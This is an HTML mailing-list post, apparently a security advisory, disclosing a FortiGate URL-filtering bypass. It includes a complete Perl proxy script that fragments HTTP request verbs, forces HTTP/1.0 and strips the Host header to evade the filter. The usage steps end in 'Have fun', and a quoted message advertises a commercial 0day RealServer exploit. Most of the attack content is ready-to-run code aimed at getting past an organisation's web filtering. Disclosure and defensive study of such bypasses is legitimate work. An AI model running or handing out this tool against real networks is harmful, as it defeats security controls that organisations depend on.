<html><head><style type="text/css"><!-- DIV {margin:0px;} --></style></head><body><div style="font-family:times new roman, new york, times, serif;font-size:12pt">I dont know if its new but i code it during a PentTest and i would<br>like to share it with you.<br>It is based on code developed By sinhack research labs:<br><a href="http://sinhack.net/URLFilteringEvasion/sakeru.tx" target="_blank">http://sinhack.net/URLFilterin<wbr>gEvasion/sakeru.tx</a><br><br>Description:<br>"Fortinet's URL blocking functionality can be bypassed by<br>specially-crafted HTTP requests that fulfill 3 factors:<br><br>1.- HTTP Requests are terminated by the CRLF characters.<br>2.- Forcing to talk via HTTP/1.0 version so that dont send the host header.<br>3.- Finally, by Fragmenting the GET or POST requests<br><br>Analysis:<br><br>Fortinet's past vulnerability<br>(<a href="http://www.fortiguardcenter.com/advisory/FGA-2006-10.html"
target="_blank">http://www.fortiguardcenter<wbr>.com/advisory/FGA-2006-10.html</a>) said:<br><br>Moreover, while it is possible "to bypass the functionality via an<br>HTTP/1.0 request with no host header", the use of a host field is<br>actually required to access a specific site on multi-homed web sites.<br>When no host header is used, the intended web site is actually not<br>displayed. Therefore, there is no risk.<br><br>Macula's Analysis: If you dont have properly installed some AV, HIPS,<br>etc, through this vuln, a workstation can connect to a malicious<br>"Hacking Site" and get infected. Also through this vuln, you can<br>connect to different porn sites without problems. And no matter if its<br>or not multi-homed web sites. So we consider its not a low risk.<br><br><br>Products affected:<br>We only tested it on:<br>fortiGate-1000 3.00, build 040075,070111<br><br>Solution:<br>We tried to contact the vendor, but without any
response.<br><br>PoC:<br><br>#!/usr/bin/perl<br><br>##############################<div id="1exs" class="ArwC7c ckChnd"><wbr>##########<br># fortiGuard.pl v0.1 - <a href="http://www.macula-group.com/" target="_blank">http://www.macula-group.com/</a><br>#<br># # URL Filtering Bypass proof of concept<br># Author: Daniel Regalado aka Danux... Hacker WannaBe!!! (only some<br>minnor modifications from sinhack code)<br># Based on PoC from sinhack research labs -> sakeru.pl<br>#<br>#FortiGuard's URL blocking functionality can be bypassed by<br>specially-crafted HTTP requests that are terminated by the CRLF<br>character<br>#instead of the LF characters and changing version of HTTP to 1.0<br>without sending Host: Header and Fragmenting the GET and POST Requests<br>#<br>#Tested On: fortiGate-1000 3.00, build 040075,070111<br>#<br>#This code has been released Only for educational purposes. The author<br>cannot be held responsible for any bad use.<br>#
Usage:<br># 1) perl fortiGuard.pl<br># 2) Configure your browser's proxy at localhost:5050<br># 3) Have fun.<br><br># --- Start Of Script---<br><br>use strict;<br>use URI;<br>use IO::Socket;<br><br>my $showOpenedSockets=1; #Activate the console logging<br>my $debugging=0;<br><br><br>my $server = IO::Socket::INET->new ( #Proxy Configuration<br> LocalPort => 5050, #Change the listening port here<br> Type => SOCK_STREAM,<br> Reuse => 1,<br> Listen => 10);<br><br>binmode $server;<br>print "Waiting for connections on port 5050 TCP...\n";<br><br>while (my $browser = $server->accept()) { #When a connection occure...<br> binmode $browser;<br> my $method="";<br> my $content_length = 0;<br> my $content = 0;<br> my $accu_content_length = 0;<br> my $host;<br> my $hostAddr;<br> my $httpVer;<br> my $line;<br><br> while (my $browser_line =
<$browser>) { #Get the Browser commands<br> unless ($method) {<br> ($method, $hostAddr, $httpVer) = $browser_line =~ /^(\w+)<br>+(\S+) +(\S+)/;<br><br> my $uri = URI->new($hostAddr);<br><br> $host = IO::Socket::INET->new ( #Opening the connexion to the<br>remote host<br> PeerAddr=> $uri->host,<br> PeerPort=> $uri->port ) or die "couldn't open $hostAddr";<br><br><br> if ($showOpenedSockets) { #Connection logs<br> #print "Source:".$browser->peerhost."<wbr>\n";<br> my ($sec,$min,$hour,$mday,$mon,<wbr>$year,$wday,$yday,$isdst) =<br>localtime(time);<br> $year += 1900;<br> $mon += 1;<br>
printf ("\n%04d-%02d-%02d %02d:%02d:%02d<br>",$year,$mon,$mday,$hour,$min,<wbr>$sec);<br> print $browser->peerhost." -> ".$uri->host.":".$uri->port."<br>$method ".$uri->path_query."\n";;<br> }<br><br> binmode $host;<br> my $char;<br> if ($method == "GET") { #Fragmention the "GET" query<br> foreach $char ('G','E','T',' ') { #I know, there is better<br>way to do it,<br> print $host $char; #but I'm tired and lazy...<br> }<br> } elsif ($method == "POST") { #Fragmentation of "POST" query<br> foreach $char ('P','O','S','T',' ') {<br> print $host $char;<br>
}<br> } else {<br> print $host "$method "; #For all the other methods, send<br>them without modif<br> print "*";<br> }<br> $httpVer="HTTP/1.0"; #Forzando a version 1.0<br> print $host $uri->path_query . " $httpVer\r\n"; #Send the rest<br>of the query (url and http version)<br> #next;<br> }<br><br> $content_length = $1 if $browser_line=~/Content-length<wbr>: +(\d+)/i;<br> $accu_content_length+=length $browser_line;<br><br> foreach $line (split('\n', $browser_line)) { #Fragment the Host query<br> if ($line =~ /^Host:/ ) {<br> #my $char="";<br>
#my $word="";<br> #my $bogus="";<br> #($bogus,$word) = split(' ', $line);<br> #foreach $char ('H','o','s','t',':',' ') {<br> #print $host $char;<br> #}<br> #print $host $word."\r\n";<br><br> } else {<br> print $host "$line\r\n"; #For all the other lines, send<br>them without modif<br> }<br><br> if ( $debugging == 1 && $method == "POST" ) {<br> print "$line\n";<br>
}<br> }<br> #Danux Clave para terminar el Request y enviarlo al servidor<br>web, de otra forma se queda esperando este ultimo la peticion<br> print $host "\r\n";<br><br><br> last if $browser_line =~ /^\s*$/ and $method ne 'POST';<br> if ($browser_line =~ /^\s*$/ and $method eq "POST") {<br> $content = 1;<br> last unless $content_length;<br> next;<br> }<br> #print length $browser_line . " - ";<br> if ($content) {<br> $accu_content_length+=length $browser_line;<br> last if $accu_content_length >= $content_length;<br> }<br> }<br><br> $content_length = 0;<br> $content = 0;<br>
$accu_content_length = 0;<br><br> my $crcount=0;<br> my $totalcounter=0;<br> my $packetcount=0;<br><br> while ( my $host_line = <$host> ) { #Reception of the result from the server<br><br> $totalcounter+=length $host_line;<br> print $browser $host_line; #Send them back to the browser<br> #print $host_line if ( ! $content ); #Send them back to the browser<br> if ($host_line=~/Content-length: +(\d+)/i) {<br> $content_length = $1;<br> #print " * Expecting $content_length\n"; #if ($debugging);<br> }<br> if ($host_line =~ m/^\s*$/ and not $content) {<br> $content = 1;<br> #print " * Beginning of the data section\n";<br> }<br> if ($content) {<br>
#$accu_content_length+=length $host_line;<br> if ($content_length) {<br> #print " * binary data section\n";<br> my $buffer;<br> my $buffersize = 512;<br> if ($content_length < $buffersize) { $buffersize = $content_length; }<br> while ( my $nbread = read($host, $buffer, $buffersize)) {<br> print "#";<br> $packetcount++;<br> $accu_content_length+=$nbread;<br> #last if $accu_content_length >= $content_length;<br> print $browser $buffer; #Send them back to the browser<br>
#print $buffer;<br> #print "\n(#$packetcount) ";<br> #print "total: $totalcounter content_length:<br>$content_length acc: $accu_content_length\t";<br> my $tmp1 = $content_length - $accu_content_length;<br> #print "length-accu= $tmp1\n";<br><br> if ($tmp1 < $buffersize) {<br> $buffersize = $tmp1;<br> #print "new buffersize = $buffersize\n";<br> }<br> }<br> #print "Out of the content while\n";<br> }<br> }<br><br> #print
"(#$packetcount) ";<br> #print "total: $totalcounter content_length: $content_length<br>acc: $accu_content_length\t";<br> #my $tmp1 = $content_length - $accu_content_length;<br> #print "length-accu= $tmp1\n";<br> last if ($accu_content_length >= $content_length and $content ==<br>1 and $content_length);<br> }<br> #print "\nOut for a while\n";<br><br><br> if ($browser) { $browser -> close; } #Closing connection to the browser<br> if ($host) { $host -> close; } #Closion connection to the server<br><br>}<br><br># --- EOF ---<br><font color="#888888"><br></font></div><div> </div>Danux, CISSP, OSCP<br>Offensive Security Consultant<br>Macula Security Consulting Group<br>www.macula-group.com<div style="font-family: times new roman,new york,times,serif; font-size: 12pt;"><br><br><div style="font-family: times new roman,new york,times,serif;
font-size: 12pt;">----- Mensaje original ----<br>De: "admin@gleg.net" <admin@gleg.net><br>Para: dailydave@lists.immunitysec.com<br>CC: info@gleg.net<br>Enviado: jueves, 3 de enero, 2008 4:26:15<br>Asunto: [Dailydave] 0day RealServer exploit demo<br><br>Hi,<br><br>Here is another quick demo created with vnc2swf, our old 0day <br>RealServer/Helix Server exploit - <a href="http://gleg.net/realserver.html" target="_blank">http://gleg.net/realserver.html</a><br><br>The demonstrated CANVAS module exploits a heap overflow vulnerability <br>in RealServer. The exploit was available to our clients since Oct 3, <br>2007.<br><br>Feel free to email me if any questions appear.<br><br>Happy New Year!<br><br>Regards,<br>Evgeny Legerov<br><br>_______________________________________________<br>Dailydave mailing list<br><a ymailto="mailto:Dailydave@lists.immunitysec.com"
href="mailto:Dailydave@lists.immunitysec.com">Dailydave@lists.immunitysec.com</a><br><a href="http://lists.immunitysec.com/mailman/listinfo/dailydave" target="_blank">http://lists.immunitysec.com/mailman/listinfo/dailydave</a><br></div><br></div></div><br>
<hr size=1><br><font face="Verdana" size="-2">¡Capacidad ilimitada de almacenamiento en tu correo!<br>No te preocupes más por el espacio de tu cuenta con Correo Yahoo!:<br>
http://correo.espanol.yahoo.com/</font></body></html>